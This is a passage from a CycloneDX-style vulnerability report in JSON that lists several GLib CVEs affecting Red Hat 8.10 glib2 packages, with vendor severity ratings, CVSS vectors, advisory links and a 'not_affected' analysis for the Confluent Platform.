          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58010",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. An off-by-one error can occur in the gvs_tuple_is_normal function in the glib/gvariant-serialiser.c file when doing an alignment padding check because the bounds check uses > instead of >=, causing an out-of-bounds read of only 1 byte. This issue can cause a minor information disclosure of 1 byte and a denial of service when the out-of-bounds read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58010"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-m7rp-473c-296x"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3915"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58010.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58010"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58010"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58011",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A flaw was found in GLib. An out-of-bounds read of only 2 bytes can occur in the g_date_time_get_ymd function in the glib/gdatetime.c file when an invalid GDateTime object produced by the g_date_time_add_full function is processed. This flaw can corrupt the date output and potentially cause logic errors that may lead to a denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58011"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58011"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-8xmh-8wfg-9f6j"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3917"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/work_items/3917"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58011.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58011"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58011"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58012",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. A buffer over-read can occur in the g_regex_replace function when used with the `G_REGEX_RAW` compile flag and case-change replacement escapes because the string_append function processes matched substrings using UTF-8 functions that assume valid UTF-8 input, even when the string is treated as raw bytes. This vulnerability can cause a minor information disclosure of 1-5 bytes and a denial of service when the buffer over-read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58012"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58012"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-vwg8-37h9-g38g"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3918"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58012.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58012"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58012"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58013",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. A buffer over-read can occur in g_io_channel_read_line_backend() in the giochannel.c file when a custom line terminator with a length greater than one is set, causing memcmp to read past the GString buffer. This vulnerability can cause a minor information disclosure of 7 bytes or a denial of service when the buffer over-read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58013"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58013"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
